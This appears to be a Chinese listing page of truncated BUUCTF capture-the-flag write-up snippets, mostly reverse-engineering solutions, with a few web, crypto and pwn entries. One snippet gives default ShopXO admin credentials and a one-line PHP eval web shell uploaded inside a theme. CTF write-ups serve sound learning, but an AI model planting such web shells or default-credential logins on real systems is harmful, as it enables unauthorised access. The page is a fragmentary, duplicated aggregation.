无壳,拖进ida, 然后进入sub_78A这个关键函数里去看,有点迷宫的感觉,起点为(0,0) 这里”0“是我们移动停止的条件,注意v2+=v4这一句,由于这是在while循环里的,所以他是一直以同一个方向移动的,直到碰到了...
无壳,拖进ida, 然后进入sub_78A这个关键函数里去看,有点迷宫的感觉,起点为(0,0) 这里”0“是我们移动停止的条件,注意v2+=v4这一句,由于这是在while循环里的,所以他是一直以同一个方向移动的,直到碰到了...
ida打开,逻辑很清晰 v15 = 81; v16 = 115; v17 = 119; v18 = 51; v19 = 115; v20 = 106; v21 = 95; v22 = 108; v23 = 122; v24 = 52; v25 = 95; v26 = 85; v27 = 106; v28 = 119;... scan
[GKCTF2020]Check_1n 进入程序 用IDA搜索字符串 View-Open subviews-Strings(视图-打开子视图-字符串) 找到 ...用上下左右控制里面的上下左右,空格键控制确认, 切换到打砖块程序,将光标控制至里面的回车键,用空格...
查壳后无壳,ida打开,逻辑很简单 根据最后的判断条件可以反推 说明一点,dup是 所以上面dword_40f040最后那个 8 dup(0) 的数据不是8,而是零(我之前按照8搞的一直是错的) #include <stdio.h>...
迷宫题的新花样 打开感觉就是个迷宫题 然后 根据判断条件,#应该是终点,o应该是起点 有了迷宫了,就差上下左右走的条件了,这里我看了好长时间没看出来 ,看了别人的wp才知道这里由于是sys文件,是由键盘过滤...
下载后是一个pyc文件,在线反编译一下得到源码 print 'Welcome to Re World!' print 'Your input1 is your flag~' l = len(input1) for i in range(l): num = ((input1[i] + i) % 128 + 128) % 128 #元素+下标,与...
[GKCTF2020]老八小超市儿 进入网址 admin.php进入后台 账号admin 密码shopxo 应用中心——应用商城——主题 下载默认主题 编写一个a.php文件放进默认主题 a.php文件内容 <?php @eval($_POST[a]);...
无壳,ida打开, 上网查了查traversal 然后看到最上面上面有左右指针,感觉有点像二叉树遍历 打开type1和type2 结合两个函数,第一个应该是中序遍历,第二个应该是后序遍历 然后去找字符串,找半天没找到,就...
无壳,进入ida,函数逻辑挺简单的,但是这个算法我是真没见过 网上查了查,这些题用z3库来写,顺便学了学怎么用这个库 from z3 import * s = Solver() v1 = Int('v1') v2 = Int('v2') v3 = Int('v3') ...
没有加壳,打开 有两个关键函数,sub-4010f0和sub-401050 看到两个’\n’,’\t’猜想这个sub-4010f0函数应该是进行输入和排除掉’\n’,’\t’ 再看sub-401050: sub_401050函数就是将字符串逆向做了异或操作之后...
经典无壳,拖进ida 最后输出的里面有衣穿加密字符串,一看就知道是base加密的,然后提上又提示是base64加密,拿去解密发现不对,感觉应该是吧base64的码表改了 然后找半天没找到那个函数, 然后找到这个奇怪的函数...
打开看是一整个程序,刚开始感觉和那个坦克大战有点像(小憨包笑死) 怀疑是根据选择不同的材料来达到某种条件然后输出flag 先找到c#的资源文件 dnspy打开 点开以后 果然是根据根据点击材料来控制是否输出flag,...
先查壳,没有壳,拖进ida,f12大法 发现敏感句子,进入,代码如下 signed __int64 sub_4009C6() { const char *v0; // rdi signed __int64 result; // rax __int64 v2; // ST10_8 __int64 v3;...
C#程序,且用Eazfuscator.NET混淆了代码,于是用使用de4dot工具进行处理 处理完后用dnspy反编译,找到main函数(我找了老长时间,发现可以直接程序入口) 最后有提示:flag{str+text},那么再依次求出str和text ...
WarmUp 首先查看源码,发现有source.php,跟进看看,发现了一堆代码 这个原本是phpmyadmin任意文件包含漏洞,这里面只不过是换汤不换药。 ...有兴趣的可以看一下之前我做的分析,htt...
标签: ctf
也就是说,这个shell文件告诉我们flag.zip的密码是创建flag.zip的时间戳,已知时间戳有10位和13位,然后结合zip的修改时间,猜测时间戳开头为155,那么用ARCHPR掩码爆破155?...然后看图片,是png可能是LSB隐写;...
BUUCTF刷题记录 [Reverse] [2023.01.02-01.08]
【代码】BUUCTF刷题记录---ciscn_2019_es_1。
BUUCTFweb刷题记录
buuctf刷题记录
标签: 汇编
学习之路还很漫长还有好多题要刷,加油加油!!!
标签: 网络安全
标签: php
buuctf刷题-Crypto-联想脑洞-达芬奇密码 给了两串数字和提示: (答案是一串32位十进制数字) 达芬奇隐藏在蒙娜丽莎中的数字列:1 233 3 2584 1346269 144 5 196418 21 1597 610 377 10946 89 514229 987 8 55 6765 ...
哈哈哈,我又来刷题了,看了下BUUCTF上面的pwn题还真多。。。 test_your_nc ida查看,发现直接执行system,所以,直接交互就可以 //写下简单的脚本 from pwn import * p = remote('node3.buuoj.cn',28213) p....